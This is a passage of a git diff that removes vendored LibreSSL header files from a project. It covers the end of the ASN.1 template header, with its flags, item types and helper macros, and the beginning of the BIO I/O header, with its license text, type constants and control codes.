-#define ASN1_TFLG_SEQUENCE_OF	(0x2 << 1)
-
-/* Special case: this refers to a SET OF that
- * will be sorted into DER order when encoded *and*
- * the corresponding STACK will be modified to match
- * the new order.
- */
-#define ASN1_TFLG_SET_ORDER	(0x3 << 1)
-
-/* Mask for SET OF or SEQUENCE OF */
-#define ASN1_TFLG_SK_MASK	(0x3 << 1)
-
-/* These flags mean the tag should be taken from the
- * tag field. If EXPLICIT then the underlying type
- * is used for the inner tag.
- */
-
-/* IMPLICIT tagging */
-#define ASN1_TFLG_IMPTAG	(0x1 << 3)
-
-
-/* EXPLICIT tagging, inner tag from underlying type */
-#define ASN1_TFLG_EXPTAG	(0x2 << 3)
-
-#define ASN1_TFLG_TAG_MASK	(0x3 << 3)
-
-/* context specific IMPLICIT */
-#define ASN1_TFLG_IMPLICIT	ASN1_TFLG_IMPTAG|ASN1_TFLG_CONTEXT
-
-/* context specific EXPLICIT */
-#define ASN1_TFLG_EXPLICIT	ASN1_TFLG_EXPTAG|ASN1_TFLG_CONTEXT
-
-/* If tagging is in force these determine the
- * type of tag to use. Otherwise the tag is
- * determined by the underlying type. These 
- * values reflect the actual octet format.
- */
-
-/* Universal tag */ 
-#define ASN1_TFLG_UNIVERSAL	(0x0<<6)
-/* Application tag */ 
-#define ASN1_TFLG_APPLICATION	(0x1<<6)
-/* Context specific tag */ 
-#define ASN1_TFLG_CONTEXT	(0x2<<6)
-/* Private tag */ 
-#define ASN1_TFLG_PRIVATE	(0x3<<6)
-
-#define ASN1_TFLG_TAG_CLASS	(0x3<<6)
-
-/* These are for ANY DEFINED BY type. In this case
- * the 'item' field points to an ASN1_ADB structure
- * which contains a table of values to decode the
- * relevant type
- */
-
-#define ASN1_TFLG_ADB_MASK	(0x3<<8)
-
-#define ASN1_TFLG_ADB_OID	(0x1<<8)
-
-#define ASN1_TFLG_ADB_INT	(0x1<<9)
-
-/* This flag means a parent structure is passed
- * instead of the field: this is useful is a
- * SEQUENCE is being combined with a CHOICE for
- * example. Since this means the structure and
- * item name will differ we need to use the
- * ASN1_CHOICE_END_name() macro for example.
- */
-
-#define ASN1_TFLG_COMBINE	(0x1<<10)
-
-/* This flag when present in a SEQUENCE OF, SET OF
- * or EXPLICIT causes indefinite length constructed
- * encoding to be used if required.
- */
-
-#define ASN1_TFLG_NDEF		(0x1<<11)
-
-/* This is the actual ASN1 item itself */
-
-struct ASN1_ITEM_st {
-char itype;			/* The item type, primitive, SEQUENCE, CHOICE or extern */
-long utype;			/* underlying type */
-const ASN1_TEMPLATE *templates;	/* If SEQUENCE or CHOICE this contains the contents */
-long tcount;			/* Number of templates if SEQUENCE or CHOICE */
-const void *funcs;		/* functions that handle this type */
-long size;			/* Structure size (usually)*/
-#ifndef NO_ASN1_FIELD_NAMES
-const char *sname;		/* Structure name */
-#endif
-};
-
-/* These are values for the itype field and
- * determine how the type is interpreted.
- *
- * For PRIMITIVE types the underlying type
- * determines the behaviour if items is NULL.
- *
- * Otherwise templates must contain a single 
- * template and the type is treated in the
- * same way as the type specified in the template.
- *
- * For SEQUENCE types the templates field points
- * to the members, the size field is the
- * structure size.
- *
- * For CHOICE types the templates field points
- * to each possible member (typically a union)
- * and the 'size' field is the offset of the
- * selector.
- *
- * The 'funcs' field is used for application
- * specific functions. 
- *
- * The EXTERN type uses a new style d2i/i2d.
- * The new style should be used where possible
- * because it avoids things like the d2i IMPLICIT
- * hack.
- *
- * MSTRING is a multiple string type, it is used
- * for a CHOICE of character strings where the
- * actual strings all occupy an ASN1_STRING
- * structure. In this case the 'utype' field
- * has a special meaning, it is used as a mask
- * of acceptable types using the B_ASN1 constants.
- *
- * NDEF_SEQUENCE is the same as SEQUENCE except
- * that it will use indefinite length constructed
- * encoding if requested.
- *
- */
-
-#define ASN1_ITYPE_PRIMITIVE		0x0
-
-#define ASN1_ITYPE_SEQUENCE		0x1
-
-#define ASN1_ITYPE_CHOICE		0x2
-
-#define ASN1_ITYPE_EXTERN		0x4
-
-#define ASN1_ITYPE_MSTRING		0x5
-
-#define ASN1_ITYPE_NDEF_SEQUENCE	0x6
-
-/* Cache for ASN1 tag and length, so we
- * don't keep re-reading it for things
- * like CHOICE
- */
-
-struct ASN1_TLC_st{
-	char valid;	/* Values below are valid */
-	int ret;	/* return value */
-	long plen;	/* length */
-	int ptag;	/* class value */
-	int pclass;	/* class value */
-	int hdrlen;	/* header length */
-};
-
-/* Typedefs for ASN1 function pointers */
-
-typedef ASN1_VALUE * ASN1_new_func(void);
-typedef void ASN1_free_func(ASN1_VALUE *a);
-typedef ASN1_VALUE * ASN1_d2i_func(ASN1_VALUE **a, const unsigned char ** in, long length);
-typedef int ASN1_i2d_func(ASN1_VALUE * a, unsigned char **in);
-
-typedef int ASN1_ex_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_ITEM *it,
-					int tag, int aclass, char opt, ASN1_TLC *ctx);
-
-typedef int ASN1_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass);
-typedef int ASN1_ex_new_func(ASN1_VALUE **pval, const ASN1_ITEM *it);
-typedef void ASN1_ex_free_func(ASN1_VALUE **pval, const ASN1_ITEM *it);
-
-typedef int ASN1_ex_print_func(BIO *out, ASN1_VALUE **pval, 
-						int indent, const char *fname, 
-						const ASN1_PCTX *pctx);
-
-typedef int ASN1_primitive_i2c(ASN1_VALUE **pval, unsigned char *cont, int *putype, const ASN1_ITEM *it);
-typedef int ASN1_primitive_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len, int utype, char *free_cont, const ASN1_ITEM *it);
-typedef int ASN1_primitive_print(BIO *out, ASN1_VALUE **pval, const ASN1_ITEM *it, int indent, const ASN1_PCTX *pctx);
-
-typedef struct ASN1_EXTERN_FUNCS_st {
-	void *app_data;
-	ASN1_ex_new_func *asn1_ex_new;
-	ASN1_ex_free_func *asn1_ex_free;
-	ASN1_ex_free_func *asn1_ex_clear;
-	ASN1_ex_d2i *asn1_ex_d2i;
-	ASN1_ex_i2d *asn1_ex_i2d;
-	ASN1_ex_print_func *asn1_ex_print;
-} ASN1_EXTERN_FUNCS;
-
-typedef struct ASN1_PRIMITIVE_FUNCS_st {
-	void *app_data;
-	unsigned long flags;
-	ASN1_ex_new_func *prim_new;
-	ASN1_ex_free_func *prim_free;
-	ASN1_ex_free_func *prim_clear;
-	ASN1_primitive_c2i *prim_c2i;
-	ASN1_primitive_i2c *prim_i2c;
-	ASN1_primitive_print *prim_print;
-} ASN1_PRIMITIVE_FUNCS;
-
-/* This is the ASN1_AUX structure: it handles various
- * miscellaneous requirements. For example the use of
- * reference counts and an informational callback.
- *
- * The "informational callback" is called at various
- * points during the ASN1 encoding and decoding. It can
- * be used to provide minor customisation of the structures
- * used. This is most useful where the supplied routines
- * *almost* do the right thing but need some extra help
- * at a few points. If the callback returns zero then
- * it is assumed a fatal error has occurred and the 
- * main operation should be abandoned.
- *
- * If major changes in the default behaviour are required
- * then an external type is more appropriate.
- */
-
-typedef int ASN1_aux_cb(int operation, ASN1_VALUE **in, const ASN1_ITEM *it,
-				void *exarg);
-
-typedef struct ASN1_AUX_st {
-	void *app_data;
-	int flags;
-	int ref_offset;		/* Offset of reference value */
-	int ref_lock;		/* Lock type to use */
-	ASN1_aux_cb *asn1_cb;
-	int enc_offset;		/* Offset of ASN1_ENCODING structure */
-} ASN1_AUX;
-
-/* For print related callbacks exarg points to this structure */
-typedef struct ASN1_PRINT_ARG_st {
-	BIO *out;
-	int indent;
-	const ASN1_PCTX *pctx;
-} ASN1_PRINT_ARG;
-
-/* For streaming related callbacks exarg points to this structure */
-typedef struct ASN1_STREAM_ARG_st {
-	/* BIO to stream through */
-	BIO *out;
-	/* BIO with filters appended */
-	BIO *ndef_bio;
-	/* Streaming I/O boundary */
-	unsigned char **boundary;
-} ASN1_STREAM_ARG;
-
-/* Flags in ASN1_AUX */
-
-/* Use a reference count */
-#define ASN1_AFLG_REFCOUNT	1
-/* Save the encoding of structure (useful for signatures) */
-#define ASN1_AFLG_ENCODING	2
-/* The Sequence length is invalid */
-#define ASN1_AFLG_BROKEN	4
-
-/* operation values for asn1_cb */
-
-#define ASN1_OP_NEW_PRE		0
-#define ASN1_OP_NEW_POST	1
-#define ASN1_OP_FREE_PRE	2
-#define ASN1_OP_FREE_POST	3
-#define ASN1_OP_D2I_PRE		4
-#define ASN1_OP_D2I_POST	5
-#define ASN1_OP_I2D_PRE		6
-#define ASN1_OP_I2D_POST	7
-#define ASN1_OP_PRINT_PRE	8
-#define ASN1_OP_PRINT_POST	9
-#define ASN1_OP_STREAM_PRE	10
-#define ASN1_OP_STREAM_POST	11
-#define ASN1_OP_DETACHED_PRE	12
-#define ASN1_OP_DETACHED_POST	13
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Macro to implement a primitive type */
-#define IMPLEMENT_ASN1_TYPE(stname) IMPLEMENT_ASN1_TYPE_ex(stname, stname, 0)
-#define IMPLEMENT_ASN1_TYPE_ex(itname, vname, ex) \
-				ASN1_ITEM_start(itname) \
-					ASN1_ITYPE_PRIMITIVE, V_##vname, NULL, 0, NULL, ex, #itname \
-				ASN1_ITEM_end(itname)
-
-/* Macro to implement a multi string type */
-#define IMPLEMENT_ASN1_MSTRING(itname, mask) \
-				ASN1_ITEM_start(itname) \
-					ASN1_ITYPE_MSTRING, mask, NULL, 0, NULL, sizeof(ASN1_STRING), #itname \
-				ASN1_ITEM_end(itname)
-#define IMPLEMENT_EXTERN_ASN1(sname, tag, fptrs) \
-	ASN1_ITEM_start(sname) \
-		ASN1_ITYPE_EXTERN, \
-		tag, \
-		NULL, \
-		0, \
-		&fptrs, \
-		0, \
-		#sname \
-	ASN1_ITEM_end(sname)
-
-/* Macro to implement standard functions in terms of ASN1_ITEM structures */
-
-#define IMPLEMENT_ASN1_FUNCTIONS(stname) IMPLEMENT_ASN1_FUNCTIONS_fname(stname, stname, stname)
-
-#define IMPLEMENT_ASN1_FUNCTIONS_name(stname, itname) IMPLEMENT_ASN1_FUNCTIONS_fname(stname, itname, itname)
-
-#define IMPLEMENT_ASN1_FUNCTIONS_ENCODE_name(stname, itname) \
-			IMPLEMENT_ASN1_FUNCTIONS_ENCODE_fname(stname, itname, itname)
-
-#define IMPLEMENT_STATIC_ASN1_ALLOC_FUNCTIONS(stname) \
-		IMPLEMENT_ASN1_ALLOC_FUNCTIONS_pfname(static, stname, stname, stname)
-
-#define IMPLEMENT_ASN1_ALLOC_FUNCTIONS(stname) \
-		IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, stname, stname)
-
-#define IMPLEMENT_ASN1_ALLOC_FUNCTIONS_pfname(pre, stname, itname, fname) \
-	pre stname *fname##_new(void) \
-	{ \
-		return (stname *)ASN1_item_new(ASN1_ITEM_rptr(itname)); \
-	} \
-	pre void fname##_free(stname *a) \
-	{ \
-		ASN1_item_free((ASN1_VALUE *)a, ASN1_ITEM_rptr(itname)); \
-	}
-
-#define IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname) \
-	stname *fname##_new(void) \
-	{ \
-		return (stname *)ASN1_item_new(ASN1_ITEM_rptr(itname)); \
-	} \
-	void fname##_free(stname *a) \
-	{ \
-		ASN1_item_free((ASN1_VALUE *)a, ASN1_ITEM_rptr(itname)); \
-	}
-
-#define IMPLEMENT_ASN1_FUNCTIONS_fname(stname, itname, fname) \
-	IMPLEMENT_ASN1_ENCODE_FUNCTIONS_fname(stname, itname, fname) \
-	IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname)
-
-#define IMPLEMENT_ASN1_ENCODE_FUNCTIONS_fname(stname, itname, fname) \
-	stname *d2i_##fname(stname **a, const unsigned char **in, long len) \
-	{ \
-		return (stname *)ASN1_item_d2i((ASN1_VALUE **)a, in, len, ASN1_ITEM_rptr(itname));\
-	} \
-	int i2d_##fname(stname *a, unsigned char **out) \
-	{ \
-		return ASN1_item_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(itname));\
-	} 
-
-#define IMPLEMENT_ASN1_NDEF_FUNCTION(stname) \
-	int i2d_##stname##_NDEF(stname *a, unsigned char **out) \
-	{ \
-		return ASN1_item_ndef_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(stname));\
-	} 
-
-/* This includes evil casts to remove const: they will go away when full
- * ASN1 constification is done.
- */
-#define IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(stname, itname, fname) \
-	stname *d2i_##fname(stname **a, const unsigned char **in, long len) \
-	{ \
-		return (stname *)ASN1_item_d2i((ASN1_VALUE **)a, in, len, ASN1_ITEM_rptr(itname));\
-	} \
-	int i2d_##fname(const stname *a, unsigned char **out) \
-	{ \
-		return ASN1_item_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(itname));\
-	} 
-
-#define IMPLEMENT_ASN1_DUP_FUNCTION(stname) \
-	stname * stname##_dup(stname *x) \
-        { \
-        return ASN1_item_dup(ASN1_ITEM_rptr(stname), x); \
-        }
-
-#define IMPLEMENT_ASN1_PRINT_FUNCTION(stname) \
-	IMPLEMENT_ASN1_PRINT_FUNCTION_fname(stname, stname, stname)
-
-#define IMPLEMENT_ASN1_PRINT_FUNCTION_fname(stname, itname, fname) \
-	int fname##_print_ctx(BIO *out, stname *x, int indent, \
-						const ASN1_PCTX *pctx) \
-	{ \
-		return ASN1_item_print(out, (ASN1_VALUE *)x, indent, \
-			ASN1_ITEM_rptr(itname), pctx); \
-	} 
-
-#define IMPLEMENT_ASN1_FUNCTIONS_const(name) \
-		IMPLEMENT_ASN1_FUNCTIONS_const_fname(name, name, name)
-
-#define IMPLEMENT_ASN1_FUNCTIONS_const_fname(stname, itname, fname) \
-	IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(stname, itname, fname) \
-	IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname)
-
-#endif /* !LIBRESSL_INTERNAL */
-
-/* external definitions for primitive types */
-
-extern const ASN1_ITEM ASN1_BOOLEAN_it;
-extern const ASN1_ITEM ASN1_TBOOLEAN_it;
-extern const ASN1_ITEM ASN1_FBOOLEAN_it;
-extern const ASN1_ITEM ASN1_SEQUENCE_it;
-extern const ASN1_ITEM CBIGNUM_it;
-extern const ASN1_ITEM BIGNUM_it;
-extern const ASN1_ITEM LONG_it;
-extern const ASN1_ITEM ZLONG_it;
-
-DECLARE_STACK_OF(ASN1_VALUE)
-
-/* Functions used internally by the ASN1 code */
-
-int ASN1_item_ex_new(ASN1_VALUE **pval, const ASN1_ITEM *it);
-void ASN1_item_ex_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
-int ASN1_template_new(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
-int ASN1_primitive_new(ASN1_VALUE **pval, const ASN1_ITEM *it);
-
-void ASN1_template_free(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
-int ASN1_template_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_TEMPLATE *tt);
-int ASN1_item_ex_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_ITEM *it,
-				int tag, int aclass, char opt, ASN1_TLC *ctx);
-
-int ASN1_item_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass);
-int ASN1_template_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_TEMPLATE *tt);
-void ASN1_primitive_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
-
-int asn1_ex_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len, int utype, char *free_cont, const ASN1_ITEM *it);
-
-int asn1_get_choice_selector(ASN1_VALUE **pval, const ASN1_ITEM *it);
-int asn1_set_choice_selector(ASN1_VALUE **pval, int value, const ASN1_ITEM *it);
-
-ASN1_VALUE ** asn1_get_field_ptr(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
-
-const ASN1_TEMPLATE *asn1_do_adb(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt, int nullerr);
-
-int asn1_do_lock(ASN1_VALUE **pval, int op, const ASN1_ITEM *it);
-
-void asn1_enc_init(ASN1_VALUE **pval, const ASN1_ITEM *it);
-void asn1_enc_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
-int asn1_enc_restore(int *len, unsigned char **out, ASN1_VALUE **pval, const ASN1_ITEM *it);
-int asn1_enc_save(ASN1_VALUE **pval, const unsigned char *in, int inlen, const ASN1_ITEM *it);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/bio.h b/thirdparty/libressl/include/openssl/bio.h
deleted file mode 100644
index b753596..0000000
--- a/thirdparty/libressl/include/openssl/bio.h
+++ /dev/null
@@ -1,792 +0,0 @@
-/* $OpenBSD: bio.h,v 1.30 2017/04/06 18:25:38 deraadt Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_BIO_H
-#define HEADER_BIO_H
-#if !defined(HAVE_ATTRIBUTE__BOUNDED__) && !defined(__OpenBSD__)
-#define __bounded__(x, y, z)
-#endif
-#include <openssl/opensslconf.h>
-
-# include <stdio.h>
-#include <stdarg.h>
-
-#include <openssl/crypto.h>
-
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* These are the 'types' of BIOs */
-#define BIO_TYPE_NONE		0
-#define BIO_TYPE_MEM		(1|0x0400)
-#define BIO_TYPE_FILE		(2|0x0400)
-
-#define BIO_TYPE_FD		(4|0x0400|0x0100)
-#define BIO_TYPE_SOCKET		(5|0x0400|0x0100)
-#define BIO_TYPE_NULL		(6|0x0400)
-#define BIO_TYPE_SSL		(7|0x0200)
-#define BIO_TYPE_MD		(8|0x0200)		/* passive filter */
-#define BIO_TYPE_BUFFER		(9|0x0200)		/* filter */
-#define BIO_TYPE_CIPHER		(10|0x0200)		/* filter */
-#define BIO_TYPE_BASE64		(11|0x0200)		/* filter */
-#define BIO_TYPE_CONNECT	(12|0x0400|0x0100)	/* socket - connect */
-#define BIO_TYPE_ACCEPT		(13|0x0400|0x0100)	/* socket for accept */
-#define BIO_TYPE_PROXY_CLIENT	(14|0x0200)		/* client proxy BIO */
-#define BIO_TYPE_PROXY_SERVER	(15|0x0200)		/* server proxy BIO */
-#define BIO_TYPE_NBIO_TEST	(16|0x0200)		/* server proxy BIO */
-#define BIO_TYPE_NULL_FILTER	(17|0x0200)
-#define BIO_TYPE_BER		(18|0x0200)		/* BER -> bin filter */
-#define BIO_TYPE_BIO		(19|0x0400)		/* (half a) BIO pair */
-#define BIO_TYPE_LINEBUFFER	(20|0x0200)		/* filter */
-#define BIO_TYPE_DGRAM		(21|0x0400|0x0100)
-#define BIO_TYPE_ASN1 		(22|0x0200)		/* filter */
-#define BIO_TYPE_COMP 		(23|0x0200)		/* filter */
-
-#define BIO_TYPE_DESCRIPTOR	0x0100	/* socket, fd, connect or accept */
-#define BIO_TYPE_FILTER		0x0200
-#define BIO_TYPE_SOURCE_SINK	0x0400
-
-/* BIO_FILENAME_READ|BIO_CLOSE to open or close on free.
- * BIO_set_fp(in,stdin,BIO_NOCLOSE); */
-#define BIO_NOCLOSE		0x00
-#define BIO_CLOSE		0x01
-
-/* These are used in the following macros and are passed to
- * BIO_ctrl() */
-#define BIO_CTRL_RESET		1  /* opt - rewind/zero etc */
-#define BIO_CTRL_EOF		2  /* opt - are we at the eof */
-#define BIO_CTRL_INFO		3  /* opt - extra tit-bits */
-#define BIO_CTRL_SET		4  /* man - set the 'IO' type */
-#define BIO_CTRL_GET		5  /* man - get the 'IO' type */
-#define BIO_CTRL_PUSH		6  /* opt - internal, used to signify change */
-#define BIO_CTRL_POP		7  /* opt - internal, used to signify change */
-#define BIO_CTRL_GET_CLOSE	8  /* man - set the 'close' on free */
-#define BIO_CTRL_SET_CLOSE	9  /* man - set the 'close' on free */
-#define BIO_CTRL_PENDING	10  /* opt - is their more data buffered */
-#define BIO_CTRL_FLUSH		11  /* opt - 'flush' buffered output */
-#define BIO_CTRL_DUP		12  /* man - extra stuff for 'duped' BIO */
-#define BIO_CTRL_WPENDING	13  /* opt - number of bytes still to write */
-/* callback is int cb(BIO *bio,state,ret); */
-#define BIO_CTRL_SET_CALLBACK	14  /* opt - set callback function */
-#define BIO_CTRL_GET_CALLBACK	15  /* opt - set callback function */
-
-#define BIO_CTRL_SET_FILENAME	30	/* BIO_s_file special */
-
-/* dgram BIO stuff */
-#define BIO_CTRL_DGRAM_CONNECT       31  /* BIO dgram special */
-#define BIO_CTRL_DGRAM_SET_CONNECTED 32  /* allow for an externally
-					  * connected socket to be
-					  * passed in */ 
-#define BIO_CTRL_DGRAM_SET_RECV_TIMEOUT 33 /* setsockopt, essentially */
-#define BIO_CTRL_DGRAM_GET_RECV_TIMEOUT 34 /* getsockopt, essentially */
-#define BIO_CTRL_DGRAM_SET_SEND_TIMEOUT 35 /* setsockopt, essentially */
-#define BIO_CTRL_DGRAM_GET_SEND_TIMEOUT 36 /* getsockopt, essentially */
-
-#define BIO_CTRL_DGRAM_GET_RECV_TIMER_EXP 37 /* flag whether the last */
-#define BIO_CTRL_DGRAM_GET_SEND_TIMER_EXP 38 /* I/O operation tiemd out */
-
-/* #ifdef IP_MTU_DISCOVER */
-#define BIO_CTRL_DGRAM_MTU_DISCOVER       39 /* set DF bit on egress packets */
-/* #endif */
-
-#define BIO_CTRL_DGRAM_QUERY_MTU          40 /* as kernel for current MTU */
-#define BIO_CTRL_DGRAM_GET_FALLBACK_MTU   47
-#define BIO_CTRL_DGRAM_GET_MTU            41 /* get cached value for MTU */
-#define BIO_CTRL_DGRAM_SET_MTU            42 /* set cached value for
-					      * MTU. want to use this
-					      * if asking the kernel
-					      * fails */
-
-#define BIO_CTRL_DGRAM_MTU_EXCEEDED       43 /* check whether the MTU
-					      * was exceed in the
-					      * previous write
-					      * operation */
-
-#define BIO_CTRL_DGRAM_GET_PEER           46
-#define BIO_CTRL_DGRAM_SET_PEER           44 /* Destination for the data */
-
-#define BIO_CTRL_DGRAM_SET_NEXT_TIMEOUT   45 /* Next DTLS handshake timeout to
-                                              * adjust socket timeouts */
-
-
-/* modifiers */
-#define BIO_FP_READ		0x02
-#define BIO_FP_WRITE		0x04
-#define BIO_FP_APPEND		0x08
-#define BIO_FP_TEXT		0x10
-
-#define BIO_FLAGS_READ		0x01
-#define BIO_FLAGS_WRITE		0x02
-#define BIO_FLAGS_IO_SPECIAL	0x04
-#define BIO_FLAGS_RWS (BIO_FLAGS_READ|BIO_FLAGS_WRITE|BIO_FLAGS_IO_SPECIAL)
-#define BIO_FLAGS_SHOULD_RETRY	0x08
-
-/* Used in BIO_gethostbyname() */
-#define BIO_GHBN_CTRL_HITS		1
-#define BIO_GHBN_CTRL_MISSES		2
-#define BIO_GHBN_CTRL_CACHE_SIZE	3
-#define BIO_GHBN_CTRL_GET_ENTRY		4
-#define BIO_GHBN_CTRL_FLUSH		5
-
-/* Mostly used in the SSL BIO */
-/* Not used anymore
- * #define BIO_FLAGS_PROTOCOL_DELAYED_READ 0x10
- * #define BIO_FLAGS_PROTOCOL_DELAYED_WRITE 0x20
- * #define BIO_FLAGS_PROTOCOL_STARTUP	0x40
- */
-
-#define BIO_FLAGS_BASE64_NO_NL	0x100
-
-/* This is used with memory BIOs: it means we shouldn't free up or change the
- * data in any way.
- */
-#define BIO_FLAGS_MEM_RDONLY	0x200
-
-typedef struct bio_st BIO;
-
-void BIO_set_flags(BIO *b, int flags);
-int  BIO_test_flags(const BIO *b, int flags);
-void BIO_clear_flags(BIO *b, int flags);
-
-#define BIO_get_flags(b) BIO_test_flags(b, ~(0x0))
-#define BIO_set_retry_special(b) \
-		BIO_set_flags(b, (BIO_FLAGS_IO_SPECIAL|BIO_FLAGS_SHOULD_RETRY))
-#define BIO_set_retry_read(b) \
-		BIO_set_flags(b, (BIO_FLAGS_READ|BIO_FLAGS_SHOULD_RETRY))
-#define BIO_set_retry_write(b) \
-		BIO_set_flags(b, (BIO_FLAGS_WRITE|BIO_FLAGS_SHOULD_RETRY))
-
-/* These are normally used internally in BIOs */
-#define BIO_clear_retry_flags(b) \
-		BIO_clear_flags(b, (BIO_FLAGS_RWS|BIO_FLAGS_SHOULD_RETRY))
-#define BIO_get_retry_flags(b) \
-		BIO_test_flags(b, (BIO_FLAGS_RWS|BIO_FLAGS_SHOULD_RETRY))
-
-/* These should be used by the application to tell why we should retry */
-#define BIO_should_read(a)		BIO_test_flags(a, BIO_FLAGS_READ)
-#define BIO_should_write(a)		BIO_test_flags(a, BIO_FLAGS_WRITE)
-#define BIO_should_io_special(a)	BIO_test_flags(a, BIO_FLAGS_IO_SPECIAL)
-#define BIO_retry_type(a)		BIO_test_flags(a, BIO_FLAGS_RWS)
-#define BIO_should_retry(a)		BIO_test_flags(a, BIO_FLAGS_SHOULD_RETRY)
-
-/* The next three are used in conjunction with the
- * BIO_should_io_special() condition.  After this returns true,
- * BIO *BIO_get_retry_BIO(BIO *bio, int *reason); will walk the BIO 
- * stack and return the 'reason' for the special and the offending BIO.
- * Given a BIO, BIO_get_retry_reason(bio) will return the code. */
-/* Returned from the SSL bio when the certificate retrieval code had an error */
-#define BIO_RR_SSL_X509_LOOKUP		0x01
-/* Returned from the connect BIO when a connect would have blocked */
-#define BIO_RR_CONNECT			0x02
-/* Returned from the accept BIO when an accept would have blocked */
-#define BIO_RR_ACCEPT			0x03
-
-/* These are passed by the BIO callback */
-#define BIO_CB_FREE	0x01
-#define BIO_CB_READ	0x02
-#define BIO_CB_WRITE	0x03
-#define BIO_CB_PUTS	0x04
-#define BIO_CB_GETS	0x05
-#define BIO_CB_CTRL	0x06
-
-/* The callback is called before and after the underling operation,
- * The BIO_CB_RETURN flag indicates if it is after the call */
-#define BIO_CB_RETURN	0x80
-#define BIO_CB_return(a) ((a)|BIO_CB_RETURN))
-#define BIO_cb_pre(a)	(!((a)&BIO_CB_RETURN))
-#define BIO_cb_post(a)	((a)&BIO_CB_RETURN)
-
-long (*BIO_get_callback(const BIO *b))(struct bio_st *, int, const char *,
-    int, long, long);
-void BIO_set_callback(BIO *b,
-    long (*callback)(struct bio_st *, int, const char *, int, long, long));
-char *BIO_get_callback_arg(const BIO *b);
-void BIO_set_callback_arg(BIO *b, char *arg);
-
-const char * BIO_method_name(const BIO *b);
-int BIO_method_type(const BIO *b);
-
-typedef void bio_info_cb(struct bio_st *, int, const char *, int, long, long);
-
-typedef struct bio_method_st {
-	int type;
-	const char *name;
-	int (*bwrite)(BIO *, const char *, int);
-	int (*bread)(BIO *, char *, int);
-	int (*bputs)(BIO *, const char *);
-	int (*bgets)(BIO *, char *, int);
-	long (*ctrl)(BIO *, int, long, void *);
-	int (*create)(BIO *);
-	int (*destroy)(BIO *);
-	long (*callback_ctrl)(BIO *, int, bio_info_cb *);
-} BIO_METHOD;
-
-struct bio_st {
-	BIO_METHOD *method;
-	/* bio, mode, argp, argi, argl, ret */
-	long (*callback)(struct bio_st *, int, const char *, int, long, long);
-	char *cb_arg; /* first argument for the callback */
-
-	int init;
